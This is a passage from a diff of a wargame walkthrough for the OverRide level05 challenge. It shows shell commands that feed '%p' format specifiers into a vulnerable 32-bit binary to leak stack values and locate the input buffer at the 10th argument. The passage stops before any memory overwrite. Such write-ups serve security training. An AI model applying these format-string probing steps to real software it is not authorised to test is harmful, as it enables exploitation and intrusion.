selfsigned/HackThePlanet/Override/level05/walkthrough.md

 ```
 We have another 32bit program with vulnerable format strings on our hands.

-Let's find where we control the buffer
+Let's find where we control the buffer:
 ```shell
 level05@OverRide:~$ ./level05 < <(python -c 'print "BBBB" + "%p|"*10')
 bbbb0x64|0xf7fcfac0|0xf7ec3add|0xffffd6ef|0xffffd6ee|(nil)|0xffffffff|0xffffd774|0xf7fdb000|0x62626262|
 ```
-Oh yeah, our uppercase characters get converted to lowercase, but we can see it's the 10th arg
+Oh yeah, our uppercase characters get converted to lowercase, but we can see it's the 10th argument:
 ```shell
 level05@OverRide:~$ ./level05 < <(python -c 'print "0000%10$p"')
 00000x30303030